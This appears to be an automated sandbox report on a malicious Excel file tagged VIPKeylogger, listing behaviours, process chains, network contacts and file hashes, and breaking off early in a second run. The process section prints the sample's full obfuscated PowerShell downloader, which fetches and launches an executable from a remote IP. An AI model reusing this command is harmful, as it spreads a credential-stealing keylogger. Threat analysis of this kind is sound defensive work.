Malware Analysis Report

2025-05-28 14:54

Sample ID 240821-lttnta1hld
Target 1d7c97138b80caa4a9721ce7575926397613df390e74a0642399918575044a72.xls
SHA256 1d7c97138b80caa4a9721ce7575926397613df390e74a0642399918575044a72
Tags
vipkeylogger collection credential_access defense_evasion discovery execution keylogger stealer upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1d7c97138b80caa4a9721ce7575926397613df390e74a0642399918575044a72

Threat Level: Known bad

The file 1d7c97138b80caa4a9721ce7575926397613df390e74a0642399918575044a72.xls was found to be: Known bad.

Malicious Activity Summary

vipkeylogger collection credential_access defense_evasion discovery execution keylogger stealer upx

VIPKeylogger

Process spawned unexpected child process

Credentials from Password Stores: Credentials from Web Browsers

Blocklisted process makes network request

Evasion via Device Credential Deployment

Downloads MZ/PE file

Loads dropped DLL

Executes dropped EXE

UPX packed file

Looks up external IP address via web service

Accesses Microsoft Outlook profiles

Suspicious use of SetThreadContext

AutoIT Executable

Drops file in System32 directory

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Browser Information Discovery

Uses Task Scheduler COM API

Uses Volume Shadow Copy WMI provider

outlook_office_path

Suspicious use of FindShellTrayWindow

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Suspicious use of SendNotifyMessage

Suspicious use of SetWindowsHookEx

Suspicious behavior: AddClipboardFormatListener

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Checks processor information in registry

outlook_win_path

Enumerates system info in registry

Uses Volume Shadow Copy service COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-21 09:49

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-21 09:49

Reported

2024-08-21 09:52

Platform

win7-20240729-en

Max time kernel

122s

Max time network

143s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\1d7c97138b80caa4a9721ce7575926397613df390e74a0642399918575044a72.xls

Signatures

VIPKeylogger

stealer keylogger vipkeylogger

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\ctfmon.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 332 set thread context of 2360 N/A C:\Users\Admin\AppData\Roaming\ctfmon.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\ctfmon.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\ctfmon.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\ctfmon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\ctfmon.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\ctfmon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\ctfmon.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1904 wrote to memory of 1296 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 1904 wrote to memory of 1296 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 1904 wrote to memory of 1296 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 1904 wrote to memory of 1296 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 1296 wrote to memory of 1676 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1296 wrote to memory of 1676 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1296 wrote to memory of 1676 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1296 wrote to memory of 1676 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1676 wrote to memory of 572 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1676 wrote to memory of 572 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1676 wrote to memory of 572 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1676 wrote to memory of 572 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 572 wrote to memory of 1604 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 572 wrote to memory of 1604 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 572 wrote to memory of 1604 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 572 wrote to memory of 1604 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1676 wrote to memory of 332 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\ctfmon.exe
PID 1676 wrote to memory of 332 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\ctfmon.exe
PID 1676 wrote to memory of 332 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\ctfmon.exe
PID 1676 wrote to memory of 332 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\ctfmon.exe
PID 332 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Roaming\ctfmon.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 332 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Roaming\ctfmon.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 332 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Roaming\ctfmon.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 332 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Roaming\ctfmon.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 332 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Roaming\ctfmon.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 332 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Roaming\ctfmon.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 332 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Roaming\ctfmon.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 332 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Roaming\ctfmon.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\1d7c97138b80caa4a9721ce7575926397613df390e74a0642399918575044a72.xls

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" "/C pOWErsHElL.exe -Ex bYPaSs -noP -W 1 -C DeVICecREdEnTIaLDEpLOYMENT ; iEX($(iex('[system.TeXT.EnCodiNg]'+[chAR]0X3a+[chAR]0x3a+'utf8.geTStRinG([SYStem.ConVErT]'+[ChAr]58+[cHAr]0X3A+'FROmBASE64sTRinG('+[ChAr]0X22+'JHFobFFyVUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSZGVGaU5pVGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTdHcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6VVJkLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEcsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRUU5tcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJNbFUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRVNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtUWEgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxaGxRclVFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNDUuNjYuMjMxLjIwOS8xMzEvY3RmbW9uLmV4ZSIsIiRFTnY6QVBQREFUQVxjdGZtb24uZXhlIiwwLDApO3NUYVJ0LXNMZWVwKDMpO3N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXGN0Zm1vbi5leGUi'+[chAr]34+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

pOWErsHElL.exe -Ex bYPaSs -noP -W 1 -C DeVICecREdEnTIaLDEpLOYMENT ; iEX($(iex('[system.TeXT.EnCodiNg]'+[chAR]0X3a+[chAR]0x3a+'utf8.geTStRinG([SYStem.ConVErT]'+[ChAr]58+[cHAr]0X3A+'FROmBASE64sTRinG('+[ChAr]0X22+'JHFobFFyVUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSZGVGaU5pVGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1PTi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTdHcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6VVJkLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEcsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBRUU5tcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJNbFUiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNRVNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtUWEgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRxaGxRclVFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vNDUuNjYuMjMxLjIwOS8xMzEvY3RmbW9uLmV4ZSIsIiRFTnY6QVBQREFUQVxjdGZtb24uZXhlIiwwLDApO3NUYVJ0LXNMZWVwKDMpO3N0QVJUICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXGN0Zm1vbi5leGUi'+[chAr]34+'))')))"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\avpvcuom.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1A65.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1A64.tmp"

C:\Users\Admin\AppData\Roaming\ctfmon.exe

"C:\Users\Admin\AppData\Roaming\ctfmon.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Users\Admin\AppData\Roaming\ctfmon.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 ir.cx udp
US 104.21.76.154:443 ir.cx tcp
US 8.8.8.8:53 c.pki.goog udp
FR 216.58.214.163:80 c.pki.goog tcp
NL 45.66.231.209:80 45.66.231.209 tcp
US 104.21.76.154:443 ir.cx tcp
NL 45.66.231.209:80 45.66.231.209 tcp
NL 45.66.231.209:80 45.66.231.209 tcp
US 8.8.8.8:53 checkip.dyndns.org udp
JP 132.226.8.169:80 checkip.dyndns.org tcp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 104.21.67.152:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp

Files

memory/2412-1-0x00000000724CD000-0x00000000724D8000-memory.dmp

memory/2412-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/1904-17-0x0000000001170000-0x0000000001172000-memory.dmp

memory/2412-18-0x0000000002510000-0x0000000002512000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\SDPZEA0W.txt

MD5 8c8f0be7cca815cb1fbf2dcf6077ae2f
SHA1 7017fb0ac1192d732b1b201d8ce4d98c2d89624c
SHA256 ee3b7c3bced350c1eb975a706b612d5f63810ff9219e5e25726821d3867c86b8
SHA512 607e8e676162965cb49fb09d9e621d31af80479126ece5fa90df3b3118ef9a273aaffa5a61c19a42d82585d94ebee0688bc32e422e6330d880a13b310deb05f9

C:\Users\Admin\AppData\Local\Temp\Cab11DC.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

MD5 971c514f84bba0785f80aa1c23edfd79
SHA1 732acea710a87530c6b08ecdf32a110d254a54c8
SHA256 f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA512 43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

MD5 b45fbb9ce0d2f1e273b0998784d91bc2
SHA1 4f516b2eddefca55966d604b112e67475c5ff4a4
SHA256 2fd34f3dab3327d1ea8b51beb38848e58e96734f32973a386ff52326ec7f3112
SHA512 cba01a4c0d5793e2c0b799223aa7e380b2b99787824bbab5eeae2b987e7730ae1d175c3b5766838aa6bf2959afca493075fcf02f3a1131b5c2c10abc4c538824

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

MD5 7fb5fa1534dcf77f2125b2403b30a0ee
SHA1 365d96812a69ac0a4611ea4b70a3f306576cc3ea
SHA256 33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f
SHA512 a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

MD5 cf3bd07399be9f4084372184779c0335
SHA1 cf61b1f8e6031e277dc6702aefab4547aba41c12
SHA256 7072ef60a408d2ff9b84080ea6712917fa27a384b201df0aa1032f7a1331dd11
SHA512 7bf7d4e2bb83dcd06c5673f8266d4f9b87b8acf72faba60db4358521d03076cb10923946300a5e46828797a8e0cc786a7627b7f24436b634d28b2fb818de8067

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6GL24G53\ienetsat[1].hta

MD5 c874a7cd1ef60df49ffa191421406a09
SHA1 8ea6515cf44c728d29fe179719602346e96280a3
SHA256 b72942e91327de4efa1e5741123e4bd83b03602d3546f6727499a7e8770e6683
SHA512 b06ed3b136d5acb2699927a7ec636fb6149781b4ba47eb25e81dd040d71a01872bdeb6be4afb68792354ad4a3e4eca9c44e4b4497da57d7b5e99f69494ddb667

\??\c:\Users\Admin\AppData\Local\Temp\avpvcuom.cmdline

MD5 3b34610a3ca9d4f87d2d3a060862a43b
SHA1 58d5fd8d37d1e59929d497a237e4c9cf35bd7f99
SHA256 f9ef5a8e7ae4c313a0bbee5a101ef6ba990ee1a304fc1d1b8a60e74b9d6d6743
SHA512 b734d0d832b3408ef61021d5d88799a66884756b64b72122854bbb11a31082e1e9ad6320905aaf4bbfd3d83fd6bfd86f75a99aa0126fea4d8ebc64b1453ab20b

\??\c:\Users\Admin\AppData\Local\Temp\avpvcuom.0.cs

MD5 1c63aca6fcd4b799dee16b55bce4c6e2
SHA1 8fcd80ccd2301534e23bcfd20fd94ddc46df522a
SHA256 4eb92cf06004499456c3305b5cb070bbe43de8844b267b72878ace8c339613fb
SHA512 beded648bb2a995fa8a98da6d6682f43bd33e381953def85acf6ef69e77a9f2c8faab6f421c4eff6fdd3988df8c5b46bded68b9097052ce84cff02cfa70c9c0c

\??\c:\Users\Admin\AppData\Local\Temp\CSC1A64.tmp

MD5 08fe1110373d918bcde578ebdd65dc32
SHA1 0d00b9471a17a9632d84bbc326b26d9aee995d3e
SHA256 11e71860876dc07c6f91d8d5e341a9213f85a78467a4347bdbfd72f63b8c7f46
SHA512 2a14a75eb80db6fe60c369ffef39f7744a6938449a3e3d81f4650f321e769b39c64d9ecb119a63aedf36f8473477896446d404ab4ee7e0ce03026a43ee863781

C:\Users\Admin\AppData\Local\Temp\RES1A65.tmp

MD5 bfdbaf2504c657096cbf4aa07158d24d
SHA1 614c6451a62fa41b5f5e49bb0be00814468ea9e3
SHA256 ea708fa16c8f778cfa5ce181e3c34b5692a67d91b832763410156a21fd86f785
SHA512 d833bd086e328d47fcec0c5cc264dbf151edc854c3e199801a2016aeb749a807dff401f9a04a9685002eaee2f3a9bf43224fa8cce8d8e29ad6c0935c8c4b20e4

C:\Users\Admin\AppData\Local\Temp\avpvcuom.dll

MD5 afe7b327497749f3d9b45e60893db9fd
SHA1 6095037d2d5008eae8da481e3f4411401a35808b
SHA256 c3b9839b2a24ccfd0e7f346f8a5175f6911019ff705fe5559437386de7302ae2
SHA512 f9df0b039fc0be33a7f8ec55fc47a5bc16741baf0d2c433605fabfb9f5215ed5b1d4ee3298190c97e3803b30f5d969332770865293256ca0450cac47f06fe0c5

C:\Users\Admin\AppData\Local\Temp\avpvcuom.pdb

MD5 c9f5898ca85af495e52fb9d846b543d2
SHA1 4045cb65477654a45095aedc47d44dd175812c8a
SHA256 72a06cad84f56902747380783c3d13ac55040256e3c4c65af729ded147972c18
SHA512 74f29529b49659822e35cbd65288dcfe94e4aa08d49e6e6585d7e8b26524b8c404a2bb518d94616ceb51394612b87de580cecdcdd4d7f9ba10a4c3ae687d4a03

memory/2412-53-0x00000000724CD000-0x00000000724D8000-memory.dmp

C:\Users\Admin\AppData\Roaming\ctfmon.exe

MD5 2754c20856dbcc1c2d9e8588e9ed16d5
SHA1 34e0af1d464a5ba9decc0c7d6fa8fc4791c528d5
SHA256 c8817e34d3e3721ad4a24061d9df7839a69c40661e9cf58b33b036fd3a282acd
SHA512 1d0398f4f6910396379930253436ec86d152c08a0cc88fc5cbea986211be9fe00bfabdb9b3bc39b6f323b477b60e84d1279d7bd319243ed6bdc588e2e2cba486

memory/1676-60-0x0000000006A80000-0x0000000006C1B000-memory.dmp

memory/2360-76-0x0000000000400000-0x0000000000441000-memory.dmp

memory/2360-77-0x0000000000400000-0x0000000000441000-memory.dmp

memory/332-79-0x0000000001290000-0x000000000142B000-memory.dmp

memory/2360-80-0x00000000007F0000-0x0000000000850000-memory.dmp

memory/2360-81-0x0000000000CD0000-0x0000000000D2C000-memory.dmp

memory/2360-82-0x0000000000CD0000-0x0000000000D28000-memory.dmp

memory/2360-83-0x0000000000CD0000-0x0000000000D28000-memory.dmp

memory/2360-109-0x0000000000CD0000-0x0000000000D28000-memory.dmp

memory/2360-85-0x0000000000CD0000-0x0000000000D28000-memory.dmp

memory/2360-87-0x0000000000CD0000-0x0000000000D28000-memory.dmp

memory/2360-89-0x0000000000CD0000-0x0000000000D28000-memory.dmp

memory/2360-91-0x0000000000CD0000-0x0000000000D28000-memory.dmp

memory/2360-93-0x0000000000CD0000-0x0000000000D28000-memory.dmp

memory/2360-95-0x0000000000CD0000-0x0000000000D28000-memory.dmp

memory/2360-97-0x0000000000CD0000-0x0000000000D28000-memory.dmp

memory/2360-99-0x0000000000CD0000-0x0000000000D28000-memory.dmp

memory/2360-101-0x0000000000CD0000-0x0000000000D28000-memory.dmp

memory/2360-103-0x0000000000CD0000-0x0000000000D28000-memory.dmp

memory/2360-105-0x0000000000CD0000-0x0000000000D28000-memory.dmp

memory/2360-111-0x0000000000CD0000-0x0000000000D28000-memory.dmp

memory/2360-117-0x0000000000CD0000-0x0000000000D28000-memory.dmp

memory/2360-119-0x0000000000CD0000-0x0000000000D28000-memory.dmp

memory/2360-139-0x0000000000CD0000-0x0000000000D28000-memory.dmp

memory/2360-137-0x0000000000CD0000-0x0000000000D28000-memory.dmp

memory/2360-135-0x0000000000CD0000-0x0000000000D28000-memory.dmp

memory/2360-133-0x0000000000CD0000-0x0000000000D28000-memory.dmp

memory/2360-131-0x0000000000CD0000-0x0000000000D28000-memory.dmp

memory/2360-129-0x0000000000CD0000-0x0000000000D28000-memory.dmp

memory/2360-127-0x0000000000CD0000-0x0000000000D28000-memory.dmp

memory/2360-125-0x0000000000CD0000-0x0000000000D28000-memory.dmp

memory/2360-123-0x0000000000CD0000-0x0000000000D28000-memory.dmp

memory/2360-121-0x0000000000CD0000-0x0000000000D28000-memory.dmp

memory/2360-115-0x0000000000CD0000-0x0000000000D28000-memory.dmp

memory/2360-113-0x0000000000CD0000-0x0000000000D28000-memory.dmp

memory/2360-107-0x0000000000CD0000-0x0000000000D28000-memory.dmp

memory/2412-1176-0x00000000724CD000-0x00000000724D8000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-21 09:49

Reported

2024-08-21 09:52

Platform

win10v2004-20240802-en

Max time kernel

144s

Max time network

136s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\1d7c97138b80caa4a9721ce7575926397613df390e74a0642399918575044a72.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\mshta.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Checks processor information in registry

Description Indicator Process Target
